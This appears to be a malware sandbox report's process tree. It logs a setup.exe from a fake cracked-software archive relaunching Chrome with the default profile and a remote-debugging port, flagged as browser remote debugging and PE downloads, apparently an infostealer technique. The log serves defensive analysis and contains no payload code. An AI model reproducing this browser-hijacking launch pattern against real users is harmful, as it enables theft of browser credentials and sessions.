  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --field-trial-handle=5592,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3608 /prefetch:1
  2⤵
  PID:5064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --field-trial-handle=10936,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5404 /prefetch:1
  2⤵
  PID:1408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --field-trial-handle=8860,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=12972 /prefetch:1
  2⤵
  PID:9596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=13872,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=13728 /prefetch:8
  2⤵
  PID:7560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --field-trial-handle=11004,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=1092 /prefetch:1
  2⤵
  PID:532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --field-trial-handle=13784,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10944 /prefetch:1
  2⤵
  PID:4788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --field-trial-handle=5392,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10724 /prefetch:1
  2⤵
  PID:5420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --field-trial-handle=5364,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=13928 /prefetch:1
  2⤵
  PID:9436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --field-trial-handle=3592,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=7432 /prefetch:1
  2⤵
  PID:7208

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5600

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3908

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:7932

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Bandicam_4.4 By Ajay Technical Expert\" -ad -an -ai#7zMap13644:136:7zEvent28056
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:7236

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Bandicam_4.4 By Ajay Technical Expert\" -ad -an -ai#7zMap15198:136:7zEvent7767
1⤵
PID:9708

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap10337:136:7zEvent14944
1⤵
PID:8356

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f4 0x304
1⤵
PID:9740

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap11555:186:7zEvent9727
1⤵
PID:3496

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\" -spe -an -ai#7zMap29666:174:7zEvent15397
1⤵
PID:5880

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\" -an -ai#7zMap2451:188:7zEvent23914
1⤵
PID:9064

C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe
"C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe"
1⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5572
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 1600
  2⤵
  - Program crash
  PID:2704

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:5084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.bing.com/search?q=setup.exe BugReport.exe (32 bit)"
1⤵
PID:4488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch "https://www.bing.com/search?q=setup.exe BugReport.exe (32 bit)"
  2⤵
  PID:2988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
1⤵
PID:8972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:1820

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:8820

C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe
"C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe"
1⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:8256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9203
  2⤵
  - Uses browser remote debugging
  - Enumerates system info in registry
  PID:6832
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd1f11dcf8,0x7ffd1f11dd04,0x7ffd1f11dd10
    3⤵
    PID:7884
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2024,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=2020 /prefetch:2
    3⤵
    PID:9768
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1600,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=2276 /prefetch:3
    3⤵
    PID:3796
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=2544 /prefetch:8
    3⤵
    PID:10172
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3284,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=3288 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:8892
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3292,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=1700 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:9024
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3268,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4492 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4548
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4740,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4420 /prefetch:8
    3⤵
    PID:7976
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=1604,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4908 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:9496
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3928,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4788 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:8204
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=1700,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=3468 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:8064
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4992,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5068 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:5860
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5288,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5252 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:708
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5412,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5388 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:3600
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5528,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5848 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:9072
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5416,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5572 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:8196
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5096,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6076 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:5028
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5560,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6348 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:7564
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6516,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6528 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:1372
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6652,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6672 /prefetch:8
    3⤵
    PID:8228
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6832,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6864 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:6244
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6372,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6980 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4936
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=7120,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7140 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4568
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=7276,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7300 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:5820
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=7464,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7440 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:5864
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=7708,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7732 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4492
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=7872,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7888 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4540
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=8020,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=8044 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:1592
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=8188,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=8204 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:5056
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9203 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=8624,i,2219954496629093038,10908851095341676363,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=8648 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4856
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 8256 -s 2028
  2⤵
  - Program crash
  PID:7748

C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe
"C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe"
1⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5280
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 1496
  2⤵
  - Program crash
  PID:9540

C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe
"C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe"
1⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:9832
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 9832 -s 1100
  2⤵
  - Program crash
  PID:9152

C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe
"C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe"
1⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5452
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 2032
  2⤵
  - Program crash
  PID:5732

C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe
"C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe"
1⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:10016
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 10016 -s 1632
  2⤵
  - Program crash
  PID:7628

C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe
"C:\Users\Admin\Downloads\𝗗𝗢𝗪𝗡𝗟𝗢𝗔𝗗$_𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘❏⤖𝗦𝗘𝗧3𝗨𝗣✷𝗖𝗢2𝗗𝗘\setup.exe"
1⤵
